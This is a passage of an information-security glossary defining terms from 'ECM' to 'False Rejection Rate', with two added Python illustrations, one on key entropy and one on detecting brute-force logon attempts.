– using ECM, for
example using spread-spectrum, burst, covert and/or spoof transmissions, and TEMPEST.
|
Echelon
|
NSA-led global mass
surveillance program
launched in the 1960s in conjunction with what became the Five Eyes. France has a similar program dubbed
‘Frenchelon’ with satellite ground stations (‘spy stations’) located in
mainland France and some of its overseas territories.
|
ECM
(Electronic CounterMeasures)
|
Offensive
techniques to disrupt an adversary’s electronic communications or systems, for
instance by jamming their radio links, transmitting false beacons or
misleading their automated target-acquisition systems. The electronic
equivalent of chaff (metallic strips dispensed in large numbers by a moving
vehicle to confuse radar systems). See also ECCM.
|
Economic espionage
|
Euphemism for state-sponsored industrial
espionage (surveillance,
spying) directed
against foreign corporations and (usually) their intellectual assets.
|
Eco-warrior
|
Activist
or extremist
who may sabotage
organisations
they believe to be exploiting
and wantonly harming the natural environment through their operations (e.g. mining
and oil companies destroying the rain forests, or ‘scientific’ whaling).
|
[Information
security] Education
|
General knowledge
and expertise in relation to recognizing and minimizing information risks
through appropriate security
controls. Achieved initially through the school/education system,
advice from parents and teachers etc. and then extended through
security training
and awareness
activities during employment, supplementing work and general life
experience. [In general] “Process of receiving or giving systematic
instruction, especially at a school or university” (ISO/IEC 19896-1:2018).
|
Effectiveness
|
Measure
of the quality or suitability of something for some purpose. “Extent to
which planned activities are realized and planned results achieved” (ISO/IEC 27000).
“Ability to apply knowledge and skills in a productive manner, characterized
by attributes of behaviour such as aptitude, initiative, enthusiasm,
willingness, communication skills, team participation, and leadership”
(ISO/IEC 19896-1:2018).
|
Efficiency
|
Measure
of the consumption of resources by something. “Relationship between the
results achieved and resources used” (ISO 9000).
|
Egress
filtering
|
Blocking
of traffic as it exits a network,
for example to prevent malware-infected or hacked computers on
corporate networks from sending spam
or attacking systems on external networks,
or to block highly classified
information
from passing onto an unclassified
network. Cf. ingress filtering.
|
EINSTEIN
|
Covert
US government network
security monitoring/intrusion detection
capability
originally developed by US-CERT and deployed in 2004. The current
incarnation, EINSTEIN 3, is being developed by the NSA. It reportedly monitors traffic flowing through authorized gateways between
the internal government network/s and the outside world, while a cloud-based
distributed sensor version is (also) under consideration, presumably to
counter threats
arising from the Internet
of Things and proliferating Internet connectivity.
|
Electronic archive
|
A long-term data
store (see archive).
“Long-term repository of Electronically Stored Information. Notes:
Electronic archives can be on-line, and therefore accessible, or off-line and
not easily accessible. Backup systems (e.g., tape, virtual tape, etc.) are
not intended to be electronic archives, but rather data protection systems
(i.e., recovery mechanisms for disaster recovery and business continuity).” (ISO/IEC 27050-1).
|
Electronic discovery,
eDiscovery
|
“Discovery
that includes the identification, preservation, collection, processing,
review, analysis, or production of Electronically Stored Information. Note:
Although electronic discovery is often considered a legal process, its use is
not limited to the legal domain.” (ISO/IEC 27050-1).
|
Elevation
or escalation [of privileges]
|
A multi-stage attack
(on a castle, building, system,
application, person,
organisation
etc.) in which an outsider
(e.g. an intruder, hacker
or malware)
first gains entry or a foothold innocuously through an inadequately secured
entry-point to a general access
level, then exploits
internal vulnerabilities
to gain further access to and compromise
assets that are
not directly accessible from outside. Hackers commonly gain unprivileged
access to target
systems first (e.g. by registering as a basic user with limited rights), then use
commands (often scripted in the form of malware) to exploit technical
vulnerabilities, gain privileged
or unrestricted access and hence pwn
the systems.
|
Elicitation
|
Social
engineering technique whereby, during an apparently innocuous conversation,
someone is surreptitiously probed
for additional information.
For example, the question “Was John there with Alan?” might prompt the answer “No, John wasn’t there”. The respondent’s lack of reference to Alan implies that he was there, hinting at what may have been the true purpose of the question.
|
ELINT
(ELectronic INTelligence)
|
Gleaning useful information from the characteristics of
electronic signals, aside from any intended communications content, using
electronic sensors. Spectrum analysis and direction-finding techniques, for
instance, can be used to characterize and perhaps identify a specific source
of radiated electronic signals (not necessarily a radio transmitter as
such). Part of SIGINT.
|
Electronic Warfare
(EW)
|
See cyberwar.
|
Email
(Electronic mail)
|
Popular communications mechanism that originally used
private commercial networks
(such as AOL, CompuServe and internal corporate networks) then transitioned
to the Internet
in the 1990s. Emails are sent and received asynchronously, meaning they wait
in the recipient’s mailbox until being opened and read, as opposed to
real-time and near-real-time online
chat systems
such as IM. Vulnerable to
numerous information
security threats
and incidents
such as malware,
spam, 419s and other frauds, coercion, social engineering,
unpredictable delays and occasional non-delivery or mis-delivery of messages,
interception
or inappropriate and unauthorized
disclosure of
confidential
information,
hacking of email servers/systems, spoofing of email
headers and message content etc.
|
Email
bomb,
spam bomb
|
Attempt to fill or overload a victim’s email system by sending huge quantities of spam to it e.g. by
deliberately disclosing their email address to known spammers and high-volume
mailing lists, causing frustration, cyber harassment and denial of service.
|
Emanation security
|
“The counter-measure employed to reduce classified
emanations from a facility and its systems to an acceptable level. Emanations
can be in the form of RF energy, sound waves or optical signals” (NZ information Security Manual).
See also TEMPEST
and SCIF.
|
Embedded
malware
|
Malware
(such as APTs)
hidden so deeply within a system
(possibly in the hardware,
microcode, firmware,
device drivers or
operating system
kernel) that only competent forensic
analysis (possibly involving access to the source code, compilers and
specialist tools) may reveal its presence.
|
Embedded
system
|
Usually a physically small computer system or subsystem, perhaps a thing, encased entirely within a piece of electrical, electronic or mechanical equipment (such as a computerized item of industrial plant or an ICS) and used to monitor and control the equipment. Often based on a
pared-down version of the Linux operating
system, designed
to perform specific functions very efficiently, as opposed to multipurpose
computers. May interface to a SCADA
system or the Internet
of Things.
|
Embezzlement
|
Theft of assets
entrusted to a fraudster
by the victim e.g. deposits
stolen by a dishonest
fund manager.
See also malfeasance.
|
Emergency
access
|
Route in to an access-controlled site, building, room, system etc.
for use in emergency conditions. “The process of a system user accessing
a system that they do not hold appropriate security clearances for due to an
immediate and critical emergency requirement” (NZ information Security Manual).
See also emergency intervention.
|
Emergency intervention
|
Situation in which a competent support person is specifically authorized by management to
modify a system
directly, typically through a privileged
emergency user ID,
bypassing or overriding the normal system access controls and code migration processes in order
to diagnose and resolve an urgent production issue.
|
Emergency situation
|
“A situation requiring the evacuation of a site.
Examples include fires and bomb threats” (NZ information Security Manual).
|
Emotet
|
Multifunctional
malware that has evolved from a bank Trojan in 2014 to a loader for
various forms of malware
today. In the wild
in 2019.
|
EMP (Electro-Magnetic
Pulse) weapon,
e-bomb,
HERF (High Energy Radio Frequency) gun
|
Most electrical and electronic devices are inherently highly vulnerable to
extremely strong electromagnetic fields and high voltages (such as those
produced by nearby lightning strikes, nuclear explosions or, at close range, Taser-type
devices), and/or to the accompanying power surges, unless they are sufficiently well designed,
engineered, shielded and protected to be resilient. EMP-based cyberweapons
(missiles, bombs, hand-deployed devices etc.) are intended for cybertage, cyberwar or cyberterrorism,
perhaps physically
damaging critical parts of the enemy’s cyberinfrastructure, for example CHAMP.
|
EMS
(Enterprise Mobile Security, Enterprise Mobility
Suite)
|
See MDM.
|
EMSEC
(EMissions SECurity)
|
Securing systems
against compromising
emanations e.g. using TEMPEST and Faraday cages. “The
protection resulting from all measures taken to deny unauthorized persons
information of value that might be derived from communications systems and
cryptographic equipment intercepts and the interception and analysis of
compromising emanations from cryptographic equipment, information systems,
and telecommunications systems.” (Air Force Air Intelligence, Surveillance and
Reconnaissance Agency instruction 33-203, 2011)
|
Encapsulating security payload
|
Network
security protocol, part of IPsec. “A protocol
used for encryption and authentication within IPSec” (NZ information Security Manual).
|
EnCase
|
The first widely accepted digital forensics support tool-suite, used to examine (acquire, analyse and report) digital evidence. A commercial product from OpenText.
|
Enclave
|
“Collection of information systems connected by one or
more internal networks under the control of a single authority and security
policy. The systems may be structured by physical proximity or by function,
independent of location.” (CNSSI-4009).
|
Enclave
boundary
|
“Point at which an enclave’s internal network service
layer connects to an external network’s service layer, i.e., to another
enclave or to a Wide Area Network (WAN)” (CNSSI-4009).
|
Encryption,
encrypt,
encipherment
|
Application of cryptography
to maintain the confidentiality
of information
by preventing anyone without the correct decryption key/s gaining access to or surmising the plaintext
content.
|
End
user,
user
|
Term used by snooty ICT professionals to refer (often dismissively or
disparagingly) to the people who use IT systems, networks, devices, services etc.
|
End User Computing
(EUC)
|
The practice of software development, implementation
and/or support by citizen
programmers.
|
Enforce,
enforcement
|
The use of sanctions to discourage and penalize noncompliance
or non-fulfilment of one or more obligations, expectations etc. Has
distinctly negative, demotivational connotations, as opposed to reinforcement.
|
ENIAC
(Electronic Numerical Integrator And Calculator)
|
The first Turing-complete (general purpose) electronic
computer. Designed
at the University of Pennsylvania by Mauchly and Eckert, ENIAC was delivered
to the US Army in 1946 to calculate ballistics tables. It used 17,500
electronic valves (vacuum tubes) and 1,500 relays, weighed 30 tons and
consumed 150kW. It was programmed mechanically over several days using patch
leads and switches. 50 years on, ENIAC was replicated as a single integrated
circuit approximately 3½ cm square, similar to a Pentium CPU chip. See also Colossus.
|
Enrolment
|
Process
whereby, for example, the physical characteristics of people whose identities have
been authenticated
by some other means are measured
by and registered on biometric
security devices,
thus associating biometric characteristics with user IDs.
|
Enterprise
|
“A natural or legal person engaged in an economic
activity, irrespective of its legal form, including partnerships or
associations regularly engaged in an economic activity” (GDPR).
|
Enterprise Risk
Management (ERM)
|
High level corporate governance activity for systematically identifying,
assessing, treating and monitoring/tracking
risks that are
significant to the enterprise or organisation as a whole (sometimes known
as ‘bet the farm’ risks), involving aspects such as business/commerce,
strategy, politics, health-and-safety, finance, currency, products, markets,
environment, people, compliance,
technology, information,
infrastructure etc.
|
Enticement
|
Inducing or permitting
someone to commit a crime that they would have committed anyway (e.g. the
police using closely-monitored
‘bait cars’ to entice vehicle thieves) then prosecuting them for so doing. Cf. entrapment.
|
Entrapment
|
Inducing someone to commit a crime they would not
otherwise have committed. Prosecution is likely to fail if the court accepts
this as a legitimate
defence. Cf. enticement.
“Deliberate planting of apparent flaws in an information system for the
purpose of detecting attempted penetrations” (CNSSI-4009).
|
Entropy
|
A measure
of randomness or
disorder. A high degree of entropy in encryption keys is vital to prevent cryptanalysts
directly guessing the keys by brute
force, while high entropy in the cyphertext reduces the possibility of
revealing useful information
through discernible patterns. Keys generated pseudo-randomly have marginally less
entropy than those of the same length generated randomly, a small difference
that weakens them.
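An added illustration of the point above, not from the original glossary: the bytes of a key can look random (high byte-level Shannon entropy) while the key itself is drawn from a tiny set, because a pseudo-random derivation can never contain more entropy than its seed. The PIN, the derivation and the sample data below are constructed for the example.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, estimated from the byte histogram.

    A sample of n bytes can never show more than log2(n) bits per byte, so
    this measures the sample, not the process that produced it.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def keyspace_bits(num_possible_keys: int) -> float:
    """Entropy, in bits, of a key drawn uniformly from num_possible_keys candidates."""
    return math.log2(num_possible_keys)


def expected_brute_force_guesses(bits: float) -> float:
    """Average number of guesses to hit a uniformly chosen key: about half the keyspace."""
    return 2.0 ** bits / 2.0


def key_from_pin(pin: str) -> bytes:
    """Constructed example of a weak derivation: a 32-byte 'key' stretched from a
    4-digit PIN. The output bytes look random, but only 10**4 outputs exist."""
    return hashlib.sha256(pin.encode("ascii")).digest()


def compare_keys() -> dict:
    """Contrast a PIN-derived key with one drawn uniformly from 2**256 values."""
    weak_key = key_from_pin("4271")  # constructed PIN
    pin_bits = keyspace_bits(10 ** 4)
    return {
        "weak_key_sample_entropy": shannon_entropy(weak_key),  # high: bytes look random
        "weak_key_true_bits": pin_bits,                         # ~13.3: the seed decides
        "weak_key_avg_guesses": expected_brute_force_guesses(pin_bits),  # ~5000
        "strong_key_true_bits": keyspace_bits(2 ** 256),        # 256
        "repeated_bytes_entropy": shannon_entropy(b"A" * 32),   # 0.0
    }


if __name__ == "__main__":
    for name, value in compare_keys().items():
        print(f"{name:26s} {value:.4f}")
```

The two numbers that matter to a cryptanalyst are `weak_key_true_bits` and `weak_key_avg_guesses`: a brute-force search is over the 10,000 PINs, not over the 2**256 possible 32-byte strings, whatever the byte histogram of the derived key looks like.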
|
EPIC
(Electronic Privacy
Information Center)
|
Privacy
advocacy and activist group, describing itself as a “public interest research
center in Washington, DC”. EPIC website.
|
EpicShelter
|
Secret
US surveillance
system allegedly
developed by Ed Snowden according to Oliver Stone’s biographical film Snowden.
|
Equation
Group
|
Hacker
group allegedly associated with the NSA.
|
Error
|
Mistake, accident,
unintended discrepancy etc. A breakdown or failure of integrity.
Although errors cause a far greater number of information security incidents than deliberate attacks, the effects
are usually relatively minor. Furthermore, errors are often noticed
and corrected by the people, systems
or devices that
caused them, with next to no consequential impact. Rarely, however,
unnoticed/uncorrected errors (such as software
bugs and the inappropriate use of statistics) can have extremely
serious or grave consequences such as corrupting business- or safety-critical data or leading to bad decisions.
|
Escape
|
In virtualisation,
refers to making an unauthorized
connection from a guest
system into the hypervisor,
host operating system
or another guest. Allows hacking
and data leakage
between virtual systems, or access
from a sandbox
to the host.
|
Escort
|
“A person who ensures that when maintenance or repairs
are undertaken to IT equipment that uncleared personnel are not exposed to
information” (NZ Information Security Manual).
|
Escrow
|
The safekeeping or custodianship of an asset by a trusted person or organisation (the ‘escrow agent’),
enabling its release to one or more third parties if certain conditions
(usually specified formally in a contract)
are met. Examples include key
escrow and source
code escrow. The control
hinges on the trustworthiness
and competence
of the agent.
|
Escrow
fraud
|
Type of fraud
in which an escrow
agent betrays the trust
placed in them by the owner
of assets placed
in their care, normally embezzling
the assets.
|
ESI
(Electronically Stored Information)
|
Data.
“Data or information of any kind and from any source, whose temporal
existence is evidenced by being stored in or on any electronic medium.
Notes: ESI includes traditional e-mail, memos, letters, spreadsheets,
databases, office documents, presentations and other electronic formats
commonly found on a computer. ESI also includes system, application and
file-associated metadata such as timestamps, revision history, file type,
etc. Electronic medium can take the form of, but is not limited to, storage
devices and storage elements.” (ISO/IEC 27040).
|
ESI
analysis
|
Forensic
examination/study of ESI.
“Element of an electronic discovery process focused on evaluating
Electronically Stored Information for content and context to identify facts,
relationships, key patterns, and other features that can lead to improved
understanding of an ESI corpus. Note: Content and context can include key
patterns, topics, people and discussions.” (ISO/IEC 27050-1).
|
ESI
collection
|
Seizure or collection of ESI, usually from a crime scene. “Element
of an electronic discovery process focused on gathering Electronically Stored
Information and other related material” (ISO/IEC 27050-1).
|
ESI identification
|
“Element of an electronic discovery process focused on
locating potential sources and the criteria for selecting potentially
relevant Electronically Stored Information” (ISO/IEC 27050-1).
|
ESI
preservation
|
“Element of an electronic discovery process focused on
ensuring that Electronically Stored Information is protected against
inappropriate alteration or destruction. Note: In some matters or
jurisdictions, there can be requirements to prevent spoliation of
Electronically Stored Information” (ISO/IEC 27050-1).
|
ESI
processing
|
Extraction of ESI
from storage media
etc. “Element of an electronic discovery process focused on extracting
Electronically Stored Information and converting it, if necessary, to forms
more suitable for ESI review and ESI analysis” (ISO/IEC 27050-1).
|
ESI
production
|
Providing, revealing or presenting ESI e.g. in court. “Element
of an electronic discovery process focused on delivering or making available
Electronically Stored Information. Notes: ESI production can also include
getting Electronically Stored Information in appropriate forms and using
appropriate delivery mechanisms. ESI production can be to any person or organisation”
(ISO/IEC 27050-1).
|
ESI
review
|
“Element of an electronic discovery process focused on
screening Electronically Stored Information based on specific criteria.
Note: In some matters or jurisdictions, Electronically Stored Information
that is considered privileged can be excluded from production” (ISO/IEC 27050-1).
|
Espionage
|
See spying.
|
Essential communications
|
“Communications whose contents are necessary for the
prevention of or relief from disasters and for the maintenance of public
order in adverse conditions” (ISO/IEC 27011).
|
EternalBlue
|
NSA
hacking tool that exploits a zero-day vulnerability
in Windows SMB (Server Message Block). A month before the
hacker group Shadow Brokers
disclosed this and other tools in April 2017, the NSA notified Microsoft, who
issued a critical patch.
Networked systems that were
not patched in time (including old Windows systems no longer fully supported)
were vulnerable to the Petya, WannaCry and other ransomware outbreaks.
|
Ethereal
|
See Wireshark.
|
Ethics,
ethical
|
Behaviour broadly accepted as appropriate, right and
proper, at least within the culture or organisation in which it occurs. Ethical
beliefs and standards vary, however. A practice considered ethical within
the hacker
underground, for example, may be entirely unacceptable and
inappropriate (unethical)
to society at large including information
security and law enforcement
professionals.
|
Ethical
dilemma
|
Situation in which ethical constraints, objectives, rules, laws, regulations, directives etc.
come into conflict, requiring a worker
either to make a difficult personal decision regarding how to resolve the
dilemma and achieve the most beneficial or least damaging net outcome, or to
seek further guidance from management,
trustworthy
colleagues etc.
|
Ethical
hacking
|
Hacking
or penetration testing
of ICT networks and systems etc. by
white hats that
is explicitly sanctioned, authorized,
permitted or
commissioned by their owners
for the purposes of identifying known security vulnerabilities. Normally
covered by an explicit contract
defining the scope, nature of tests permitted and forbidden, constraints, confidentiality
of the results etc.
|
Ettercap
|
Hacking/penetration testing
tool, capable of mounting MITM
attacks on LAN
traffic.
|
European Data Protection Board
|
European Union body tasked with supervising and
coordinating data
protection (privacy)
arrangements under GDPR
across Europe, for instance liaising with and guiding national privacy
ombudsmen or supervisory authorities.
|
EV
(Extended Validation)
|
Certification
authorities may conduct additional checks on applicants for their digital certificates,
typically offering the resulting ‘EV’ certificates at a higher price
reflecting the additional costs and trustworthiness. They typically confirm
the identity
and legal status of the applicant organisation with the relevant national authorities – a
kind of corporate background
check – as required by the CA/Browser Forum, an industry body.
Several inappropriate certification incidents (mis-issuance) call into question the
value of voluntary compliance
with an industry code in this area, leading to calls for stronger oversight,
tighter regulation and accreditation,
if not a complete overhaul of the certification business.
|
Evaluator
|
Person who evaluates (checks, tests and compares)
something against expectations, requirements or criteria. “Individual
assigned to perform evaluations in accordance with a given evaluation
standard and associated evaluation methodology. Note: An example of an
evaluation standard is ISO/IEC 15408 with the associated evaluation
methodology given in ISO/IEC 18045” (ISO/IEC 19896-1:2018).
|
Event
|
Generally, a trivial or benign form of incident, possibly just a small part of a
developing situation (perhaps a symptom, indicator, flag or forewarning). For
example, while an event such as a single logon failure may simply result from
someone forgetting or mistyping their password, it could be the first
indication of a determined brute
force attack
by hackers. “Occurrence
or change of a particular set of circumstances. Notes: an event can be one
or more occurrences, and can have several causes; an event can consist of
something not happening; an event can sometimes be referred to as an
‘incident’ or ‘accident’” (ISO/IEC 27000). See also information security
event.
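An added example of the distinction drawn in this entry, not from the original glossary: detection logic that treats a lone logon failure as a benign event but flags a source that produces a burst of failures inside a sliding window as a possible brute-force attack. The log format, addresses and user names are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of authentication events (not from the original page).
SAMPLE_LOG = """\
2024-05-01T09:00:01 LOGIN_FAILURE user=alice src=10.0.0.5
2024-05-01T09:00:40 LOGIN_SUCCESS user=alice src=10.0.0.5
2024-05-01T09:10:00 LOGIN_FAILURE user=bob src=203.0.113.7
2024-05-01T09:10:02 LOGIN_FAILURE user=bob src=203.0.113.7
2024-05-01T09:10:03 LOGIN_FAILURE user=carol src=203.0.113.7
2024-05-01T09:10:05 LOGIN_FAILURE user=dave src=203.0.113.7
2024-05-01T09:10:06 LOGIN_FAILURE user=erin src=203.0.113.7
2024-05-01T09:10:08 LOGIN_FAILURE user=frank src=203.0.113.7
2024-05-01T09:30:00 LOGIN_FAILURE user=bob src=10.0.0.9
"""

LINE_RE = re.compile(r"^(\S+) (LOGIN_FAILURE|LOGIN_SUCCESS) user=(\S+) src=(\S+)$")


def parse_log(text):
    """Parse log lines into (timestamp, kind, user, src) tuples; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, kind, user, src = m.groups()
            events.append((datetime.fromisoformat(ts), kind, user, src))
    return events


def failures_by_source(events):
    """Group (timestamp, user) of each failed logon by source address."""
    failures = defaultdict(list)
    for ts, kind, user, src in events:
        if kind == "LOGIN_FAILURE":
            failures[src].append((ts, user))
    return failures


def find_brute_force(events, threshold=5, window=timedelta(minutes=5)):
    """Flag sources with >= threshold failures inside any sliding time window.

    Returns {src: (max_failures_in_window, distinct_users_targeted)}. A source
    with a lone failure is a benign event and never appears in the result.
    """
    alerts = {}
    for src, items in failures_by_source(events).items():
        items.sort()
        start = 0
        best = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[src] = (best, len({user for _, user in items}))
    return alerts


def benign_sources(events, threshold=5, window=timedelta(minutes=5)):
    """Sources whose failures never reached the threshold: events, not incidents."""
    flagged = find_brute_force(events, threshold, window)
    return sorted(src for src in failures_by_source(events) if src not in flagged)


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("alerts:", find_brute_force(evs))
    print("benign:", benign_sources(evs))
```

The distinct-user count is the detail worth keeping in the alert: many failures against one account may be a forgotten password, whereas the same number spread across several accounts from one source is the signature of password spraying.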
|
Evidence
|
Information
which proves or disproves something. See also digital evidence and forensic evidence.
|
Evidence preservation facility
|
Typically a firesafe, vault, evidence room or similar
secure storage facility providing excellent physical protection for forensic evidence.
“Secure environment or a location where collected or acquired evidence is
stored. Note: An evidence preservation facility should not be exposed to
magnetic fields, dust, vibration, moisture or any other environmental
elements (such as extreme temperature or humidity) that may damage the
potential digital evidence within the facility.” (ISO/IEC 27037).
|
Evil
twin
|
Network
hack using a fake/spoofed public Wi-Fi hotspot that
forwards traffic from connected devices
to a genuine public Wi-Fi hotspot or otherwise to the Internet. The evil twin silently intercepts/monitors the
traffic and has full access
to any unencrypted content. It may also perform man-in-the-middle attacks,
surreptitiously manipulating the traffic en route.
|
Exculpatory
|
Forensic
evidence allegedly demonstrating that someone or something was not
involved in an incident,
clearing them of blame. Cf. inculpatory.
|
Exception
|
An extraordinary occurrence, such as an unusual event, an
unanticipated (and therefore potentially unhandled) state, condition, data value or unauthorized noncompliance.
Cf. exemption.
“The formal acknowledgement that a requirement of the NZISM cannot be met
and that a dispensation from the particular compliance requirement is granted
by the Accreditation Authority. This exception is valid for the term of the
Accreditation Certificate or some lesser time as determined by the
Accreditation Authority” (NZ Information Security Manual).
|
Exceptions and waivers
|
“An exception is NOT the same as a waiver. An
exception means that the requirement need not be followed. A waiver means
that some alternative controls or conditions are implemented” (NZ Information Security Manual).
|
Execution
|
(a) Formal signing demonstrating commitment to a
legally-binding contract
or agreement by duly authorized
signatories. (b) Running a computer program. (c) Capital punishment.
|
Executive
management,
executives, ‘the Execs’,
senior management,
top management,
C-suite,
mahogany row etc.
|
The most senior managers running the organisation (in conjunction with lower management
tiers) on a day-to-day basis who are ultimately accountable to stakeholders for protecting and exploiting the organisation’s information assets. On behalf of the organisation’s
legal owners and
other external stakeholders, the governing body (normally the Board of Directors)
gives executives both the obligation
or responsibility
and the authority
or control over
the organisation’s resources, for example ensuring that information risks
are identified, assessed and treated in accordance with the organisation’s
business objectives,
through diligence and due
care. In short, the buck stops here. “Person or group
of people who have delegated responsibility from the governing body for
implementation of strategies and policies to accomplish the purpose of the organisation.
Note: executive management is sometimes called top management and can include
Chief Executive Officers, Chief Information Officers, Chief Financial Officers,
Chief Information Officers, and similar roles” (ISO/IEC 27000).
|
Exemption,
waiver
|
Noncompliance
explicitly authorized
by the relevant authority
after due consideration and consultation with information risk and security experts. Normally limited in
duration as well as scope, and compensating controls may be mandated.
The person requesting an exemption, normally the Information Asset Owner or Risk Owner,
remains personally accountable
for the residual risk
and any consequential incidents.
Cf. exception.
|
Exfiltration,
exfiltrate
|
Covert
extraction of sensitive/valuable
information assets
from a supposedly secure system,
device, network or organisation.
Normally implies that the information
is being ‘pushed out’ or ‘carried out’ by an agent within (a person or malware), but it
may also be ‘pulled out’ by someone on the outside (a social engineer,
hacker etc.).
Cf. infiltration.
|
Exit
strategy
|
Whereas normally we consider the risks when going into a new situation,
there may also be substantial risks involved in staying there and/or in
getting out. With cloud
computing for example, a breakdown in the relationship with the CSP may lead to
problems for the organisation
in retrieving its information
and transferring the service to another CSP or in-house. Preparing a
strategy for exiting the relationship gracefully is a form of business continuity management, part of risk management.
|
Experience
|
The intangible knowledge, wisdom, competence and/or skill that accumulates as one does
something repeatedly. A valuable information asset. “Involvement at a
practical level with projects related to the field of competence” (ISO/IEC
19896-1:2018).
|
Expert
witness
|
Person acknowledged to have extensive experience and skill in specialized subjects such as information security
or forensics,
capable of analysing, presenting and interpreting the facts objectively for
the court. Offers an informed, dispassionate, unbiased opinion on complex
forensic evidence.
|
Exploit,
“sploit”
|
Verb: to take advantage of or use. Although in the
information security
domain the term usually implies a negative, unethical, unwelcome, inappropriate, unauthorized
or harmful activity, it can also be positive (e.g. an organisation legitimately
exploits its assets
and capabilities to achieve its business objectives). Noun: the hacking program, malware payload, script,
tool and/or process
used by a threat agent
to take advantage of a security
vulnerability. “Sploit” is a leet form.
|
Exploit kit
|
See crimeware.
|
Exposure
|
The degree to which a vulnerability could be exploited by a threat. For example, security
vulnerabilities caused by bugs
in Internet-facing
web servers tend
to be far more exposed to hacking
than those affecting internal corporate systems, with several layers of protection
between them and external hackers.
|
External
|
Outside the organisation’s physical, organisational and network boundary. Cf. internal.
|
External
context
|
“External environment in which the organisation seeks
to achieve its objectives. Notes: external context can include the
following: the cultural, social, political, legal, regulatory, financial,
technological, economic, natural and competitive environment, whether
international, national, regional or local; key drivers and trends having
impact on the objectives of the organisation; and relationships
with, and perceptions and values of, external stakeholders.” (ISO Guide 73).
|
External
party
|
Term used in the ISO27k standards as a synonym for ‘third party’.
External implies either a separate organisation or a part of the same organisation
that is outside the scope of its ISMS.
|
Extinguisher
|
Manual or automated device for putting out fires using an extinguishant gas (such as
carbon dioxide, nitrogen or FM-200),
liquid (such as water), foam, powder or cloth (fire blanket). May be
portable/hand-held, mounted to a vehicle, or permanently installed within a
facility. A corrective
control.
|
Extortion
|
The use of coercion
(typically involving threats
of cybertage,
disclosure of confidential
information
or denial of
service through ransomware,
or physical harm) to obtain assets
(generally money) from a target
individual or organisation.
|
Extranet
|
“Extension of an organisation's Intranet, especially
over the public network infrastructure, enabling resource sharing between the
organisation and other organisations and individuals that it deals with by
providing limited access to its Intranet. Note: For example, an organisation's
customers can be provided access to some part of its Intranet, creating an
extranet, but the customers cannot be considered ‘trusted’ from a security
standpoint.” (ISO/IEC
27033-1).
|
Extraterritoriality
|
A legal principle that
potentially gives the authorities powers over foreigners outside their normal
jurisdiction, for example prosecuting and penalizing non-European organisations for failing to comply with GDPR by protecting the privacy
rights of EU citizens whose personal information they obtain.
|
Extremist,
extremism
|
Someone whose views or ideology are way out of line with
the general population. Between activist
and terrorist
on a notional threat
scale.
|
Extrusion
|
Unauthorized
transfer of information
from the internal
to external
environments, typically using network
connections and/or various covert
channels or methods
such as a drop. Cf. intrusion.
|
Facility
|
Site, installation, building, room etc. “An
area that facilitates government business. For example, a facility can be a
building, a floor of a building or a designated area on the floor of a
building” (NZ Information Security Manual).
|
Failover,
fail-over
|
Manual or automated process for transferring resilient ICT services between redundant
equipment, campuses and/or network
routes, providing high availability,
hopefully averting more serious incidents.
“The capability to switch over automatically (typically without human
intervention or warning) to a redundant or standby information system upon
the failure or abnormal termination of the previously active system” (CNSSI-4009).
|
Failsafe,
fail-safe,
fail-secure,
fail-closed
|
Engineering concept used heavily in safety-critical
or other high-security system
and process designs whereby a control failure or
adverse situation leaves the system/process in an inherently safe or secure – albeit
perhaps only partially functional – state or condition.
|
Fail-soft,
fail-gracefully
|
Resilience
arrangement. See also load-shedding.
“Selective termination of affected nonessential processing when hardware
or software failure is determined to be imminent” (CNSSI-4009).
|
Fail-unsafe,
fail-unsecure,
fail-open
|
Undesirable state for systems and processes that have not been explicitly
designed to be
safe and secure (i.e. failsafe) under all conditions, and hence are
‘fragile’. For example, an access
control that fails spontaneously or is actively disabled or
bypassed in an attack,
may permit inappropriate access
that it was supposed to have prevented or at least detected. In the absence
of compensating
controls, security by obscurity can fail spectacularly if details
of a supposedly obscure vulnerability
are widely disclosed.
|
FAIR
(Factor Analysis of
Information Risk)
|
The Open Group’s structured risk analysis method, which examines various parameters
(factors) to estimate the magnitude and probability of losses and hence risk.
|
Fair
use
|
Copyright
laws generally permit limited use of copyright materials without the intellectual property owner’s explicit permission.
Such fair use exemptions
typically allow reproduction (such as quoting and summarizing) of
non-substantial or inconsequential parts of copyright materials for limited
research and educational
purposes, or to create backup/archive copies.
|
Faith
|
Sometimes described as ‘blind trust’ or ‘wishful thinking’, faithful
people believe in something without evidence of its validity and veracity,
sometimes to the point of ignoring or flatly and irrationally denying
credible evidence to the contrary. Faith is not a control but a potentially harmful form of
delusion, manipulation, coercion
or social
engineering.
|
Fake
|
Spoofed
item that misrepresents
the genuine article. See also counterfeit.
|
Fake
news
|
Propaganda
in the form of fabricated ‘news’ stories circulated online through websites
and social media,
with the specific aim of misleading and influencing (coercing) the general population. Fake
news stories are also used as clickbait.
|
Fallback
|
Use of robustness,
resilience, redundancy and/or
failover
features in a system
or process to
continue to deliver limited critical services under emergency conditions when
the primary mechanisms have been compromised in an incident. A form of contingency planning.
See also failover.
|
False
acceptance,
type I error
|
Authentication
failure in which an impostor is incorrectly associated with someone else’s identity. Cf.
false rejection.
|
False Acceptance
Rate
(FAR)
|
Commonplace metric
for a biometric
system, measuring
the proportion of authentications
that exhibit type 1
errors. “The measure of the likelihood that the biometric
security system will incorrectly accept an access attempt by an unauthorized
user. A system’s false acceptance rate typically is stated as the ratio of
the number of false acceptances divided by the number of identification
attempts.” (CNSSI-4009). See also False Rejection Rate.
|
False
flag
|
An attempt to get an attack attributed to an innocent party,
deflecting blame from the perpetrator while denigrating the accused.
|
False
rejection,
type II error
|
Authentication
failure in which the system
denies or fails to confirm a person’s true identity. Cf. false acceptance.
|
False Rejection
Rate
(FRR)
|
Commonplace metric
for a biometric
system, measuring
the proportion of authentications
that exhibit type II
errors. “The measure of the likelihood that the biometric
security system will incorrectly reject an access attempt by an authorized
user. A system’s false rejection rate typically is stated as the ratio of
the number of false rejections divided by the number of identification
attempts.” (CNSSI-4009). See also False Acceptance Rate.
